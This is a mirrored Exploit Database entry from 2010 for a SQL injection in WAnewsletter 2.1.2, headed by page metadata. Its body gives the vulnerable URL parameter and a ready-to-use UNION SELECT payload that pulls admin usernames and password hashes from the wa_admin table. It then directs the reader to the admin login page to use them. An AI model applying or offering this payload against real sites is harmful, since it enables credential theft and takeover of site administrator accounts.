WAnewsletter 2.1.2 – SQL Injection

• Exploit Database
• 111 阅读

• 作者： BrOx-Dz
  日期： 2010-09-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15090/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41

  ================================================ WAnewsletter v 2.1.2 SQL Injection Vulnerability ================================================   ################################################################################################ # Exploit Title: WAnewsletter v 2.1.2 SQL Injection Vulnerabilitie # Date: 23/09/2010 # Author: BrOx-Dz # Author: E.dz@hotmail.fr # Software Link:http://phpcodeur.net/wascripts/wanewsletter/releases/2.1.2/wanewsletter-2.1.2.zip # Dork: no Kids # Version: 2.1.2 # Tested on: windows xp pack 3 ################################################################################################ --[ Exploitable ]--   http://site/index.php?service=5&id=[SQL Injection]       http://site/index.php?service=5&id=4375+UNION+SELECT+1,2,3,concat(user,0x3a,passwd),5+from+wa_admin--     and go   http://site/admin/login.php     --[ Demo ]--     http://site/index.php?service=5&id=-4375+UNION+SELECT+1,2,3,concat(user,0x3a,passwd),5+from+wa_admin--         Good Luck